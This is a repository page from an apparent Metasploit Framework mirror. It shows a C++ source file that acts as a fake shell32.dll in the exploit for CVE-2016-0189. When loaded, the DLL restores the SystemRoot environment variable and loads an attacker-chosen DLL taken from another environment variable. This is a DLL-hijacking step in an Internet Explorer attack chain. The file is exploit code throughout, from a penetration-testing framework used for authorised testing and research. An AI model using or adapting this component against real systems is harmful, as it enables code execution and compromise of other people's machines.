infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/external/source/exploits/cve-2016-0189/ieshell32.cpp

40 lines
937 B
C++
Raw Blame History

/*
From: https://gist.github.com/worawit/1213febe36aa8331e092
Fake shell32.dll to be loaded after modified %SystemRoot%
*/
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
static void do_work()
{
WCHAR envBuffer[256];
GetEnvironmentVariableW(L"SaveSystemRoot", envBuffer, sizeof(envBuffer));
// restore system root
SetEnvironmentVariableW(L"SystemRoot", envBuffer);
//SetEnvironmentVariableW(L"SaveSystemRoot", NULL);
GetEnvironmentVariableW(L"MyDllPath", envBuffer, sizeof(envBuffer));
SetEnvironmentVariableW(L"MyDllPath", NULL);
// shell32.dll will be unloaded, use another dll
LoadLibraryExW(envBuffer, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
do_work();
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
Reference in New Issue View Git Blame Copy Permalink